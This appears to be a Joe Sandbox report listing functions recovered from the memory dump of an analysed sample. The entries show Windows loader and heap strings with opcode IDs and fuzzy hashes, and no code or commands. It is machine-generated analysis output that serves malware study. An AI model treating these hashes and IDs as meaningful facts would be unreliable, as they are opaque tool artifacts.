                                                                                                                      Function 0140245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • apphelp.dll, xrefs: 01402462
                                                                                                                      • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0144A992
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0144A9A2
                                                                                                                      • LdrpDynamicShimModule, xrefs: 0144A998
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-176724104
                                                                                                                      • Opcode ID: 47b7199cf46a5821ab60a349a8a82d618da99fa25fe31d962a0524a52d50f940
                                                                                                                      • Instruction ID: 9c527e4bd3687014208d0507f41caf6f00e526a10c88b1788f5b1e889f5d653d
                                                                                                                      • Opcode Fuzzy Hash: 47b7199cf46a5821ab60a349a8a82d618da99fa25fe31d962a0524a52d50f940
                                                                                                                      • Instruction Fuzzy Hash: 3C3107B5641202ABEF319F5DD846E6A77B4FB84B04F26406FF902673B5D7B05941C780
                                                                                                                      Function 013F29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • HEAP: , xrefs: 013F3264
                                                                                                                      • HEAP[%wZ]: , xrefs: 013F3255
                                                                                                                      • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013F327D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                      • API String ID: 0-617086771
                                                                                                                      • Opcode ID: ea11ce3ed783a40c4119d334b118792064eb7c5ad9448b353999414a867e2a4a
                                                                                                                      • Instruction ID: 849f9312b961080b355c07799445b249202cd0ba2abf2dab43fb28e8f3bc9fc5
                                                                                                                      • Opcode Fuzzy Hash: ea11ce3ed783a40c4119d334b118792064eb7c5ad9448b353999414a867e2a4a
                                                                                                                      • Instruction Fuzzy Hash: 9492BB70A04249DFEB25CF68C444BAEBBF1FF48318F18805EEA59AB791D734A945CB50
                                                                                                                      Function 013F0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-4253913091
                                                                                                                      • Opcode ID: 9180a4a34adec382cf9d8bfea15da27ee8e07cf4b0ee1013b9c35c97da47054f
                                                                                                                      • Instruction ID: 76436a474922ca1e4af873f9551b71476db76088b9b9f55cc1c31f4d5317df11
                                                                                                                      • Opcode Fuzzy Hash: 9180a4a34adec382cf9d8bfea15da27ee8e07cf4b0ee1013b9c35c97da47054f
                                                                                                                      • Instruction Fuzzy Hash: D2F18D74A00606DFEB19CF6CC494B6ABBB6FB44308F14416EE6169B7A2D734E941CF90
                                                                                                                      Function 01406962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $@
                                                                                                                      • API String ID: 0-1077428164
                                                                                                                      • Opcode ID: 7084113109dadbeaaca9372dce1fd5f2e25894656ab5a95c546cd3ab271051d8
                                                                                                                      • Instruction ID: e76539e92a2bbf9be29ac5ef14a5eafff86b6cb91a6f275f9802e62412043d11
                                                                                                                      • Opcode Fuzzy Hash: 7084113109dadbeaaca9372dce1fd5f2e25894656ab5a95c546cd3ab271051d8
                                                                                                                      • Instruction Fuzzy Hash: 04C2A5716093419FE726CF29C480B6BBBE5AF88754F05892EE9C9873A1D734E805CB52
                                                                                                                      Function 013DA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: FilterFullPath$UseFilter$\??\
                                                                                                                      • API String ID: 0-2779062949
                                                                                                                      • Opcode ID: 8779db07e725004d684bf9d43b9e61124cdfeb863f41b30b36192487d50481d2
                                                                                                                      • Instruction ID: f0a86803bc84a03bb28b10f26cb9c41a818b3fcf443c26d64e8a7d545e183556
                                                                                                                      • Opcode Fuzzy Hash: 8779db07e725004d684bf9d43b9e61124cdfeb863f41b30b36192487d50481d2
                                                                                                                      • Instruction Fuzzy Hash: 0AA15E719012299BDB31DF29CC88BEAB7B8EF58714F1001EAE909A7260D7359F85CF50
                                                                                                                      Function 01400BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrpCheckModule, xrefs: 0144A117
                                                                                                                      • Failed to allocated memory for shimmed module list, xrefs: 0144A10F
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 0144A121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-161242083
                                                                                                                      • Opcode ID: 51b4c06bee454d11f2334be06b2857994a92969c78647543a30f67913a0d79ad
                                                                                                                      • Instruction ID: d9cce26b324d9f315c3dcd4e4b0fd20ab15cae2032cc0a91421956f52616eb26
                                                                                                                      • Opcode Fuzzy Hash: 51b4c06bee454d11f2334be06b2857994a92969c78647543a30f67913a0d79ad
                                                                                                                      • Instruction Fuzzy Hash: 2971B170A402069FDF2ADF69C981BAEB7F4EB44644F15402EE506D7365E734A942CB50
                                                                                                                      Function 013F0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-1334570610
                                                                                                                      • Opcode ID: f7b98a25cc8737075855637701c58da81ad9c20c133af6e46d8d87090439b80b
                                                                                                                      • Instruction ID: 125f316448b91b4af032637303bd1d8e39b3129f64b56e874b7b4279493ef35f
                                                                                                                      • Opcode Fuzzy Hash: f7b98a25cc8737075855637701c58da81ad9c20c133af6e46d8d87090439b80b
                                                                                                                      • Instruction Fuzzy Hash: 3661BC706003459FEB29CF28C480B6ABBE6FF45708F15856EE5498F6A6D770E881CB91
                                                                                                                      Function 0141C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Failed to reallocate the system dirs string !, xrefs: 014582D7
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 014582E8
                                                                                                                      • LdrpInitializePerUserWindowsDirectory, xrefs: 014582DE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-1783798831
                                                                                                                      • Opcode ID: 503f1ab00c55b1b6ec91da07d31f08331f03eb7f8e2bbad423526d8aa2dfe2b1
                                                                                                                      • Instruction ID: 56ea1c87dd74d26e03da332fe5f6ce5f8caecc74ae153249dc6dcc0bd9cdfb15
                                                                                                                      • Opcode Fuzzy Hash: 503f1ab00c55b1b6ec91da07d31f08331f03eb7f8e2bbad423526d8aa2dfe2b1
                                                                                                                      • Instruction Fuzzy Hash: B641F371681302ABDB21EB69DC84B5B77E8EB54B54F01482FF958D72B5EBB0D8008B91
                                                                                                                      Function 0149C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • @, xrefs: 0149C1F1
                                                                                                                      • PreferredUILanguages, xrefs: 0149C212
                                                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0149C1C5
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                      • API String ID: 0-2968386058
                                                                                                                      • Opcode ID: 5b6f4fe4030e7293161df8c1f7f849f39e5afd52e65d815e09c85376d6934784
                                                                                                                      • Instruction ID: 1acc484900717c63ed70b58a936029bb59453176948e35284f56de5079ff8f0a
                                                                                                                      • Opcode Fuzzy Hash: 5b6f4fe4030e7293161df8c1f7f849f39e5afd52e65d815e09c85376d6934784
                                                                                                                      • Instruction Fuzzy Hash: 47417272E00219EFDF11DFD9C891FEEBBB8AB14704F1440ABE609A72A0D7749A458B50
                                                                                                                      Function 01474144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                      • API String ID: 0-1373925480
                                                                                                                      • Opcode ID: b61a650641ea58191d4788fb3127f1c222eeea0f5ae86ae69e68e5a99562d5de
                                                                                                                      • Instruction ID: 86cd557f591e6e895bf6994f912ced2592bddd37239fc54e70127df7b0433c6d
                                                                                                                      • Opcode Fuzzy Hash: b61a650641ea58191d4788fb3127f1c222eeea0f5ae86ae69e68e5a99562d5de
                                                                                                                      • Instruction Fuzzy Hash: 7D411331A042598BEB26DBD9D844BFEBBB8FF65384F18045BD901EB7A1D7348901CB11
                                                                                                                      Function 01464755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01464888
                                                                                                                      • minkernel\ntdll\ldrredirect.c, xrefs: 01464899
                                                                                                                      • LdrpCheckRedirection, xrefs: 0146488F
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                      • API String ID: 0-3154609507
                                                                                                                      • Opcode ID: 4d275aa3f16aef72eb42c641ed67fd63dfe75813fea9153894f70e75700217c0
                                                                                                                      • Instruction ID: c3dcae3cfa6cc91b09825aed295552ca37a38f38fb1539b251e32954fff8056a
                                                                                                                      • Opcode Fuzzy Hash: 4d275aa3f16aef72eb42c641ed67fd63dfe75813fea9153894f70e75700217c0
                                                                                                                      • Instruction Fuzzy Hash: 2C41D236A053518BCF21CE69D940A27BBE8EF89A58B0A015FED48D7371D730D800CB82
                                                                                                                      Function 013F0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                      • API String ID: 0-2558761708
                                                                                                                      • Opcode ID: 60b8af5594a4d52e192dbd3632246c13ab0103cbbaf6ecbc0e599034b0a62568
                                                                                                                      • Instruction ID: c8ddfa70f7d0f250a843ee9f372b5c8d75a3590d4ea61de9a73d09e97c50cdb9
                                                                                                                      • Opcode Fuzzy Hash: 60b8af5594a4d52e192dbd3632246c13ab0103cbbaf6ecbc0e599034b0a62568
                                                                                                                      • Instruction Fuzzy Hash: 7211CD313161469FEB2DCA1CD481B7AB3A6AF5161EF19816EF506CF662DB30DC41C750
                                                                                                                      Function 014620DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • Process initialization failed with status 0x%08lx, xrefs: 014620F3
                                                                                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01462104
                                                                                                                      • LdrpInitializationFailure, xrefs: 014620FA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                      • API String ID: 0-2986994758
                                                                                                                      • Opcode ID: 9fd41679647e482accd3f98194177fafc7c5f20d3d427b1c9106f140138fbed2
                                                                                                                      • Instruction ID: 636ab37616e731a610ce24de9347a34e3fd94ddbe66f5d612666fbb7c58c2d24
                                                                                                                      • Opcode Fuzzy Hash: 9fd41679647e482accd3f98194177fafc7c5f20d3d427b1c9106f140138fbed2
                                                                                                                      • Instruction Fuzzy Hash: C5F0F475640308BBEB24EA4D8C46FD63B6CEB40F08F50001EFA0077392D2F0A9008B82
                                                                                                                      Function 013F03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ___swprintf_l
                                                                                                                      • String ID: #%u
                                                                                                                      • API String ID: 48624451-232158463
                                                                                                                      • Opcode ID: 6f28c6b001b6683dd7cb1b5969eb7e45ff33846ce7c64e19c2a5df1d475c402f
                                                                                                                      • Instruction ID: fd138fb6bafe1a40d535d266e894718ed8ea71520053a9be196d735c6c709a9a
                                                                                                                      • Opcode Fuzzy Hash: 6f28c6b001b6683dd7cb1b5969eb7e45ff33846ce7c64e19c2a5df1d475c402f
                                                                                                                      • Instruction Fuzzy Hash: 6D716FB1A0010A9FDB05DF99C980FAEB7F8FF18304F15406AEA05E7261EA34ED41CB61
                                                                                                                      Function 013EA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • LdrResSearchResource Enter, xrefs: 013EAA13
                                                                                                                      • LdrResSearchResource Exit, xrefs: 013EAA25
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                                      • API String ID: 0-4066393604
                                                                                                                      • Opcode ID: c468aa01699ee5dd887906f8a2aa8ecfec7edae61a59dfbedc322983fdf891a6
                                                                                                                      • Instruction ID: 6d68fe987aa974c89959561fd462d892d29e29509f7a1a1d613f122deb914516
                                                                                                                      • Opcode Fuzzy Hash: c468aa01699ee5dd887906f8a2aa8ecfec7edae61a59dfbedc322983fdf891a6
                                                                                                                      • Instruction Fuzzy Hash: 41E19271E003299BFF22CF99D984BAEBBB9BF14718F10452AF901E72A1D7749941CB50
                                                                                                                      Function 014AA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: `$`
                                                                                                                      • API String ID: 0-197956300
                                                                                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction ID: a64ad2f6cfb048cd346a8799b229f5b815f74a7c47b831117f1e9da3c8e9aa85
                                                                                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                                      • Instruction Fuzzy Hash: 5FC1E2312043429BE725CF29C840B6BBBE5EFE4318F694A2EF696CB2A0D774D505CB41
                                                                                                                      Function 0145E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Legacy$UEFI
                                                                                                                      • API String ID: 2994545307-634100481
                                                                                                                      • Opcode ID: e227bf3ae95a7fb0df9c2f455c88079d9447da53128799f18be9983742604d93
                                                                                                                      • Instruction ID: 392c60cc5833d20711cd87bdff0403a8dc5e9b71ad376eb1bb683e1447f50c12
                                                                                                                      • Opcode Fuzzy Hash: e227bf3ae95a7fb0df9c2f455c88079d9447da53128799f18be9983742604d93
                                                                                                                      • Instruction Fuzzy Hash: 35619D71E002199FDB54DFA9C940BAEFBB5FB48704F14406EEA49EB262D730EA40CB50
                                                                                                                      Function 014843D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: @$MUI
                                                                                                                      • API String ID: 0-17815947
                                                                                                                      • Opcode ID: 260cb34b48e61c348b46a7fff3794bb9a1416d60940997c4d298dd770efb1c7e
                                                                                                                      • Instruction ID: 7a0a4806a419065f23d6522021f0000343a0014651391f44edffea0448123d41
                                                                                                                      • Opcode Fuzzy Hash: 260cb34b48e61c348b46a7fff3794bb9a1416d60940997c4d298dd770efb1c7e
                                                                                                                      • Instruction Fuzzy Hash: EB512771E0021EAEDF11DFA9CC90FEFBBB8EB54754F14052AE611B72A0D6709A45CB60
                                                                                                                      Function 013E04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013E063D
                                                                                                                      • kLsE, xrefs: 013E0540
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                                      • API String ID: 0-2547482624
                                                                                                                      • Opcode ID: 492cf5a99d954a6092e3eeb30311b7920b4d19f20dc937ae08e32cc13e4244d7
                                                                                                                      • Instruction ID: 231aab6f72b1b5075cf2f366037056cd3b114706bfb1128eb7454a10a8ec2fb0
                                                                                                                      • Opcode Fuzzy Hash: 492cf5a99d954a6092e3eeb30311b7920b4d19f20dc937ae08e32cc13e4244d7
                                                                                                                      • Instruction Fuzzy Hash: DB51AE716047529BD728EF69C4887A7BBE4EF84318F10483EE6E987281E7B09545CF91
                                                                                                                      Function 013EA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 013EA309
                                                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 013EA2FB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                                      • API String ID: 0-2876891731
                                                                                                                      • Opcode ID: b2492b55898feb2f173159e4a083c069c4f362c9330b822fa0cd8dc8e03f406f
                                                                                                                      • Instruction ID: ca337ab19634bb4e1bf37b1e4ae40abee626b0dd1db00ac38bcae234ccbc5204
                                                                                                                      • Opcode Fuzzy Hash: b2492b55898feb2f173159e4a083c069c4f362c9330b822fa0cd8dc8e03f406f
                                                                                                                      • Instruction Fuzzy Hash: 7441CD30A047A9DBEB12CF59D844B6ABBF4FF84308F1440AAE914DB7A1E3B5D900CB50
                                                                                                                      Function 0141A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InitializeThunk
                                                                                                                      • String ID: Cleanup Group$Threadpool!
                                                                                                                      • API String ID: 2994545307-4008356553
                                                                                                                      • Opcode ID: b9bd335ad3ce1b411fcf77db3e8813895958806ad912bb4c18730fdd16c53b5b
                                                                                                                      • Instruction ID: fd9cbd4472f209282979bc51b473b36e01b569b495c4b66ff8a926f9292e6185
                                                                                                                      • Opcode Fuzzy Hash: b9bd335ad3ce1b411fcf77db3e8813895958806ad912bb4c18730fdd16c53b5b
                                                                                                                      • Instruction Fuzzy Hash: 3A01D1B2255740AFD311DF14CD45F2677E8E794729F05893AE68CC75A4E374E804CB46
                                                                                                                      Function 013EC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: MUI
                                                                                                                      • API String ID: 0-1339004836
                                                                                                                      • Opcode ID: 6daae28c16a667c2101e22de489122f25eae53b571436b80826050bf9f654de3
                                                                                                                      • Instruction ID: 6a4abb3e69e7b4b3937d0e8f692cbe4421b68f9ce955e1c2f8b94263657723dd
                                                                                                                      • Opcode Fuzzy Hash: 6daae28c16a667c2101e22de489122f25eae53b571436b80826050bf9f654de3
                                                                                                                      • Instruction Fuzzy Hash: 30825B75E003298BEB25CFA9C988BEDBBF5BF44318F148169E919AB291D7309D41CF50
                                                                                                                      Function 01466420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: 776e58bd0055b033d3b3b362a1d0960cf8d55edd9d9005ac84948fd27f9fb8ba
                                                                                                                      • Instruction ID: b82708a91ed9b2d652c57953e8c4feba97e1969c7ad537626e927f14f6191819
                                                                                                                      • Opcode Fuzzy Hash: 776e58bd0055b033d3b3b362a1d0960cf8d55edd9d9005ac84948fd27f9fb8ba
                                                                                                                      • Instruction Fuzzy Hash: 14918671900219AFEB21DF95DD45FAFBBB8EF14754F11402AF604AB1A0D775AD00CB51
                                                                                                                      Function 0148E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000005.00000002.2040409716.00000000013B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013B0000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_5_2_13b0000_SW_48912.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 0-3916222277
                                                                                                                      • Opcode ID: a2ba62f5085df04d5dd2df7aa0e51b15c83ada05848d2c15d03fcdc34e45f4ec
                                                                                                                      • Instruction ID: 1d701c4ab82877bbda6341a5100698b95f7f52c444b362be52463a74449069c5
                                                                                                                      • Opcode Fuzzy Hash: a2ba62f5085df04d5dd2df7aa0e51b15c83ada05848d2c15d03fcdc34e45f4ec
                                                                                                                      • Instruction Fuzzy Hash: E291BF3190061ABEDB22AFA5DC44FEFBBB9EF55740F10002AF605A7260DB749942CB90
                                                                                                                      Function 0141A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
